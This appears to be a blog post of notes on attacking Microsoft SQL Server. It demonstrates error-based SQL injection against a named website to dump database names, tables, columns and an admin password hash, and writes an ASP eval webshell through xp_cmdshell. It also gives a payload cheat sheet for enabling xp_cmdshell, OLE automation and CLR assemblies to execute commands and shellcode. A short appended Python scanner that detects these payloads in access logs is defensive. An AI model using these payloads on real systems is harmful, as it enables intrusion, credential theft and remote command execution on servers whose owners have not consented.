mssql

Reference links: https://www.cnblogs.com/shellr00t/p/5310187.html

https://fuping.site/2017/05/16/MSSQL-DBA-Permission-GET-WEBSHELL/

1. Error-based injection:

【1】 First, reveal the version: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0

Error message: 在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1)
' 转换成数据类型 int 时失败。

Why this works: @@version is an MSSQL global variable. When the condition is written as "and @@version>0", MSSQL is forced to convert @@version to a number; the conversion fails, and the error message exposes the database version string.
Similarly:
@@SERVERNAME: reveals the computer (server) name

【2】 Current database name: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and db_name()>0

Error message: 在将 nvarchar 值 'kaifeng' 转换成数据类型 int 时失败。

【3】 Current user: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and User_Name()>0

Error message: 在将 nvarchar 值 'dbo' 转换成数据类型 int 时失败。
PS: if the user is dbo, the current database user most likely has DBA privileges.

【4】 Other databases: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0

Error message: 在将 nvarchar 值 'master' 转换成数据类型 int 时失败。
To reveal the next database, exclude the names already seen: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
To continue: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','kaifeng'))>0

【5】 Tables:

http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from [database_name].sys.all_objects where type='U' AND is_ms_shipped=0)>0
Example:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0)>0
Error message: 在将 nvarchar 值 'FRIENDLINK' 转换成数据类型 int 时失败。
Next table: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK'))>0
Continuing:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('FRIENDLINK','FRIENDLINK1'))>0

【6】 Columns: http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0

Example:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN')>0
Error message: 在将 nvarchar 值 'ID' 转换成数据类型 int 时失败。
Next column:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID'))>0
Continuing:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 COLUMN_NAME from kaifeng.information_schema.columns where TABLE_NAME='A_WEBADMIN' and COLUMN_NAME not in('ID','A_USERNAME'))>0

【7】 Data:

http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 column_name from database_name.table_name)>0
Example:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and (select top 1 A_PASSWORD from A_WEBADMIN)>0
Error message: 在将 nvarchar 值 'B5A1EF8730200F93E50F4F5DEBBCAC0B' 转换成数据类型 int 时失败。

If the database user has DBA privileges and the website path is known, this statement can be used to write a one-line webshell:
http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--

The principle: SQL Server supports stacked queries, and xp_cmdshell can execute cmd commands; in cmd, 【echo content > file】 writes a file to disk.

Basic notes

Error-based injection

';waitfor delay '0:0:5';--


?Id=admin' and 1=convert(int,(SQL statement)) AND 'CvNI'='CvNI

################################################ Database information ##########################################################
1=convert(int,(db_name()))  # get the current database name
1=convert(int,(@@version))  # get the database version
1=convert(int,(select quotename(name) from master..sysdatabases FOR XML PATH(''))) # get all databases in one query
1=convert(int,(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH('')))  # get all databases in one query (%2b is a URL-encoded +)

################################################ USER information ##########################################################
and 1=(select IS_SRVROLEMEMBER('db_owner')) # check for db_owner / sysadmin / public membership (not tested successfully); if true the page renders normally, otherwise it errors. Note: IS_SRVROLEMEMBER only checks server roles such as sysadmin; db_owner is a database role, checked with IS_MEMBER
1=convert(int,(user)) # get the user connected to the database
admin' AND 1878=CONVERT(INT,(SELECT SUBSTRING((CASE WHEN(IS_SRVROLEMEMBER('db_owner')=1)THEN '1' ELSE '0' END),1,100)))  AND 'iaQQ'='iaQQ # from sqlmap; also not tested successfully

################################################ Table names ##########################################################
Get all table names
1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('V_XG_BZKS_SHSJHD','HH_HeartHealthRefer_Web'))) # add each reported table name to the "table_name not in" tuple

Get the table names of a specified database
1=convert(int,(select top 1 quotename(name) from [database_name]..sysobjects where name not in('table_name1','table_name2') and xtype='U')) # get table names one at a time, adding each reported name to the tuple
1=convert(int,(select quotename(name) from [database_name]..sysobjects where xtype='U' FOR XML PATH(''))) # get all table names in one query; fails when there are many tables
1=convert(int,(select top 1 table_name from information_schema.tables where table_catalog='database_name' and table_name not in('V_XG_BZKS_SHSJHD','HH_HeartHealthRefer_Web'))) # add each reported table name to the "table_name not in" tuple

################################################ Column names ##########################################################
Get the column names of the table behind the injection point
having 1=1 --
group by column_name1,column_name2 having 1=1--

Get the column names of any table
1=convert(int,(select quotename(name) from [database_name]..syscolumns where id =(select id from [database_name]..sysobjects where name='table_name') FOR XML PATH(''))) # lists all column names of the table in one query; recommended when the table has few columns

################################################ Dumping data ##########################################################
1=(select top 1 * from [database_name]..[table_name] FOR XML PATH(''))

Command execution

xp_cmdshell

Prerequisites:
The MSSQL service is not running with reduced privileges
The database password has been obtained

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'                                     # check xp_cmdshell status; returns 1 if it exists

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;              # enable xp_cmdshell

exec master..xp_cmdshell 'nslookup 8.8.8.8'                                                                           # execute a command via xp_cmdshell

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'                                                    # xplog70.dll can be used to restore a deleted xp_cmdshell

COM component abuse: executing commands with SP_OACREATE

Prerequisites:
The MSSQL service is not running with reduced privileges
The database password has been obtained

select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'                                    # check SP_OACREATE status; returns 1 if it exists

EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;          # enable SP_OACREATE (Ole Automation Procedures)

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\1.txt'         # execute a command

CLR command execution

exec sp_configure 'clr enabled', 1;RECONFIGURE;                   # enable CLR integration
ALTER DATABASE master SET TRUSTWORTHY ON;

use master;
if exists(select * from master.sys.all_objects where name='runcode') drop function runcode;
if exists(select * from master.sys.assemblies where name = 'kindman') drop assembly kindman;
CREATE ASSEMBLY [kindman] AUTHORIZATION [dbo] FROM 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 WITH PERMISSION_SET = UNSAFE;

declare @x nvarchar(max)='CREATE function runcode (@sc nvarchar(max)) returns nvarchar(max) AS EXTERNAL NAME [kindman].[KindCLR].[runcode]';exec sp_executesql @x;

select master.dbo.runcode('shellcode');
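As an added defensive example (not part of the original post), here is a small Python scanner that URL-decodes the query string of each request in web-server access logs and tags the payload families catalogued in the notes above: type-conversion error injection, FOR XML PATH extraction, WAITFOR delays, and the xp_cmdshell / sp_oacreate / sp_configure statements from the command-execution section. The log layout, the signature labels and the sample log lines are my own assumptions, constructed for this example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Payload families from the notes above; the labels are my own.
SIGNATURES = {
    "error_based_convert": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "error_based_compare": re.compile(
        r"(?:@@version|@@servername|db_name\(\)|user_name\(\))\s*>\s*0", re.I),
    "having_leak": re.compile(r"\bhaving\s+1\s*=\s*1", re.I),
    "for_xml_exfil": re.compile(r"\bfor\s+xml\s+path\b", re.I),
    "time_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "ole_automation": re.compile(r"\bsp_oa(?:create|method)\b", re.I),
    "config_tamper": re.compile(
        r"\bsp_configure\b|\bsp_addextendedproc\b|\bcreate\s+assembly\b|\btrustworthy\b", re.I),
}

# Common-log-format request line (assumed layout for this example).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def normalize(query):
    """Decode form encoding (+ and %xx), then percent-decode once more to catch double encoding."""
    text = unquote(unquote_plus(query))
    return re.sub(r"\s+", " ", text)

def classify(query):
    """Return the signature labels that match the decoded query string, in SIGNATURES order."""
    text = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(log_text):
    """Return one finding per request whose query string matches at least one signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("path").partition("?")[2])
        if tags:
            hits.append({"ip": m.group("ip"), "status": int(m.group("status")), "tags": tags})
    return hits

# Constructed sample lines (not real traffic); the 500s mirror the conversion errors shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Nov/2022:21:37:01 +0800] "GET /lzygg/Zixun_show.aspx?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [20/Nov/2022:21:37:02 +0800] "GET /lzygg/Zixun_show.aspx?id=1%20and%20@@version%3E0 HTTP/1.1" 500 1203
10.0.0.7 - - [20/Nov/2022:21:37:03 +0800] "GET /lzygg/Zixun_show.aspx?id=1%20and%201%3Dconvert(int,(select%20'|'%2bname%2b'|'%20from%20master..sysdatabases%20FOR%20XML%20PATH(''))) HTTP/1.1" 500 1410
10.0.0.7 - - [20/Nov/2022:21:37:05 +0800] "GET /lzygg/Zixun_show.aspx?id=1;exec%20master..xp_cmdshell%20'whoami'-- HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A run of conversion errors (HTTP 500) from one client followed by a stacked xp_cmdshell request is the sequence the notes above describe, so correlating the tags per source IP is the useful next step.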
Posted 2022-11-20 21:37 by 是谁走漏了消息